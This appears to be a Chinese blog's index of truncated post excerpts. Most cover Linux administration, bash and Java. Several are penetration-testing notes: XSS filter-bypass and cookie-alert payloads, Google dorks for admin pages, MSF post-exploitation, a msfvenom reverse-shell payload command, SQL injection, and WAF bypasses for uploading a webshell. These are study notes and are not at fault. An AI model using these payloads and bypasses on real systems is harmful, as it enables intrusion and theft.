/usr,/usr/local/ 还是 /opt 目录区别 Linux 的软件安装目录是也是有讲究的,理解这一点,在对系统管理是有益的/us(Unix Software Resource)r:系统级的目录,可以理解为C:/Windows/,/usr/lib理解为C:/Windows/System32。/usr/local:用户级的程序目录,可以理解为C:/Progrem Files/。用户自己编译的软件默认会安装到这个目录下。/opt:用...
XSS的简单过滤和绕过 XSS的简单过滤和绕过程序猿用一些函数将构成xss代码的一些关键字符给过滤了。但是,道高一尺魔高一丈,虽然过滤了,还是可以尝试进行过滤绕过,以达到XSS攻击的目的。最简单的是输入<script> alert(7)</script> 弹出7 一:区分大小写过滤标签可以使用大小写绕过 <scripT>alert(7)</s...
渗透测试之信息收集 信息收集:Google搜索:intext:后台登录(搜索正文中包含后台登录的网页)alltitle:后台登录 管理员(搜索包含后台登录 管理员的网页,可以指定多个词)inurl:login(搜索URL中包含Login的网页)inurl:/admin/login.php(查找管理员登录页面)inurl:/phpmyadmin/index.php(查找后台数据库管...
bd----------高并发与负载均衡--------lvs搭建 实际操作过程中,开启httpd服务后可能物理机能ping通该IP但是无法访问该IP的80端口,此时需要关闭centos系统的防火墙转载于:https://www.cnblogs.com/ryuuku/p/11627368.html...
bd----------高并发与负载均衡--------lvs三种模型推导 lvsVIP:虚拟服务器地址DIP:转发的网络地址 -1,与RIP通信:ARP协议,获取Real Server的RIP:MAC地址 -2,转发Client的数据包到RIP 上(隐藏的VIP)RIP:后端的真实主机CIP:客户端IP地址 ...
bd------bash编程--引用&命令替换 [root@node01 sh]# a=99[root@node01 sh]# echo "$a"99[root@node01 sh]# echo '$a'$a[root@node01 sh]# echo $a99[root@node01 sh]# echo "99"99[root@node01 sh]# echo "\"99\"""99"[root...
bd------bash编程--表达式 :[root@node01 ~]# vi /etc/sysconfig/network-scripts/ifcfg-eth0转载于:https://www.cnblogs.com/ryuuku/p/11624183.html
bd------bash编程--重定向和变量1 文本流和重定向覆盖重定向[root@node01 ~]# ls / 1>aaa追加重定向[root@node01 ~]# ls /mnt >>aaa先输出外层内容再输出内层内容[root@node01 ~]# ls /tmp //:bin boot dev etc home jdk-7u67-lin...
bd------bash编程--变量2 变量的特殊情况:当变量与字符串一起使用时,需注意把echo $12 改为 echo ${12}参数引用时关于$1是否需要引用的情况是:不加引号时 bash 和脚本函数 都可以应用$1变量导致冲突若想把参数$1当作变量传给bash引用时不加引号,传给前面的命令时加上引号bash对逗号不敏感,对空格敏感,如下图...
bd-----软件安装 ---恢复内容开始--- 安装rpm格式的jdk包[root@node01 /]# rpm -ivh jdk-7u67-linux-x64.rpm添加环境变量:[root@node01 /]# vi /etc/profileexport JAVA_HOME = /usr/java/jdk1.7.0_67export PATH = $PA...
bd-----用户管理 [root@node01 ~]# useradd sxt01[root@node01 home]# passwd sxt01[root@node01 /]# mkdir /share[root@node01 share]# groupadd share[root@node01 share]# id root[root@node01 share]# id sxt01...
bd-----文本分析 wc :print newline, word, and byte counts for each filevi 全屏编辑器sed : 行编辑器修改文件ifcfg-eth0 中的IP地址[root@node01 ~]# sed 's/\(IPADDR=\(\([0-9]\|[1-9][0-9]\|1[0-9][0-9]\...
软件安全--xss跨站脚本攻击 简介:恶意攻击者往Web页面里插入恶意Script代码,当用户浏览页面时,嵌入其中的Script代码会被执行,从而达到恶意攻击用户的目的。触发:发生在目标网站中目标用户的浏览器层面上常见:公共留言板,公共可见文本测试方法:(1)cookies弹框<script>alert(document.cookie)</script>(2)cookie...
JPA查询转换自定义对象 今天有遇到需要用JPA查询数据,并将结果转换到DTO的场景,找到了两种方法,这里记录一下其中实体类为:@Data@Entity@Table(name = "CLASSIFY_PERSON")public class ClassifyPerson { @Id private String id; @Column private...
后渗透 MSF后渗透包括:提权,进程迁移,令牌假冒,获取凭证,操作文件系统,系统其它操作,端口转发和内网代理,后门提权通常webshell的权限都比较低,能够执行的操作有限,没法查看重要文件、修改系统信息、抓取管理员密码和hash、安装特殊程序等,所以我们需要获取系统更高的权限。绕过UAC用户帐户控制(UAC)是微软在 Windows Vista 以后版本引入的一种安全机制,有助...
Msf小结 Msfvenom是有效负载生成和编码的组合。生成攻击载荷Linux下反弹Meterpreter shell1msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<your port to connect on> -e -f elf -a...
SQL Injection SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。0x01定义具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句本质代码和数据...
安全狗文件绕过 上传绕过WAF的一些常用方法0X01姿势总结(1)fuzz文件名后缀方法用burpsuite进行模糊测试,寻找黑名单之外的文件(2)windows系统可以进行后缀修改如:webshell.php……………..(3)路径绕过:有些WAF只会监视某个目录是否被上传webshell(4)大小写组合如:PhP,pHp(5)filename换行(6)多个filename(7)引号绕过如:双...
Linux 基础整理 Linux系统的启动过程大体上可分为五部分:内核的引导;运行init;系统初始化;建立终端 ;用户登录系统。用户登录Linux的账号验证程序是login,login会接收mingetty传来的用户名作为用户名参数。然后login会对用户名进行分析:如果用户名不是root,且存在/etc/nologin文件,login将输出nologin文件的内容,然后退出。这通常用来系统维护时防...